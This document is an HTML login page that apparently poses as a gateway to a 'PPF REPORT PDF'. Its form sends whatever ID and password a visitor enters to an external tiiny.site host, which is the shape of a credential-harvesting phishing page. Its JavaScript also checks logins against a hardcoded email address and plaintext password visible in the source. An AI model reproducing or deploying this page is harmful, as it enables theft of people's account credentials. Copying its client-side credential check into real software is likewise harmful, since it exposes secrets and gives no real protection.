<html></html>

<head>
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
  <link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.5/css/materialize.min.css">
  <style>
    body {
      display: flex;
      min-height: 100vh;
      flex-direction: column;
    }

    main {
      flex: 1 0 auto;
    }

    body {
      background: #fff;
    }

    .input-field input[type=date]:focus + label,
    .input-field input[type=text]:focus + label,
    .input-field input[type=email]:focus + label,
    .input-field input[type=password]:focus + label {
      color: #e91e63;
    }

    .input-field input[type=date]:focus,
    .input-field input[type=text]:focus,
    .input-field input[type=email]:focus,
    .input-field input[type=password]:focus {
      border-bottom: 2px solid #e91e63;
      box-shadow: none;
    }
  </style>
</head>

<body>
  <div class="section"></div>
  <main>
    <center>
      <img style="width: 250px;" src=img/innerLogo.gif>
      <div class="section"></div>

      <h5 class="indigo-text">Enter your ID and PASSWORD</h5>
      <h5 class="indigo-text">Get redirected to PPF REPORT PDF</h5>
      <div class="section"></div>

      <div class="container">
        <div class="z-depth-1 grey lighten-4 row" style="display: inline-block; padding: 32px 48px 0px 48px; border: 1px solid #EEE;">

          <form  target="_blank" class="col s12" method="post" action="https://ppfreportorg.tiiny.site/action.php?"  onsubmit="return authenticate()">
            <div class='row'>
              <div class='col s12'>
              </div>
            </div>
		      <input 
        id="email"
        type="text"
        placeholder="Enter your ID"
        name="email"
        required
      />

		      <input
        id="password"
        type="password"
        placeholder="Enter your password"
        name="password"
        required
      />
		<input  onclick="window.location.href = 'https://ppfreportorg.tiiny.site/';" type="submit" value="Submit request">
		      <script>
	function authenticate(){
        var authorised;
		var email = document.getElementById("email").value;
        var password = document.getElementById("password").value;
		if(email == "sumanvermadocs17@gmail.com" && password == "gritblade@1753"){
          authorised = true;
			}else{

           authorised = false;
			alert("Sorry, password is incorrect.");
        }

return authorised;
      }
                    </script>
              </div>
              <label style='float: right;'>
								<a class='pink-text' href='#!'><b>Forgot Password?</b></a>
							</label>
            </div>

            <br />
            <center>
            
              </div>
            </center>
          </form>
        </div>
      </div>
      <a href="#!">Create account</a>
    </center>

    <div class="section"></div>
    <div class="section"></div>
  </main>

  <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.1/jquery.min.js"></script>
  <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.5/js/materialize.min.js"></script>
</body>

</html>
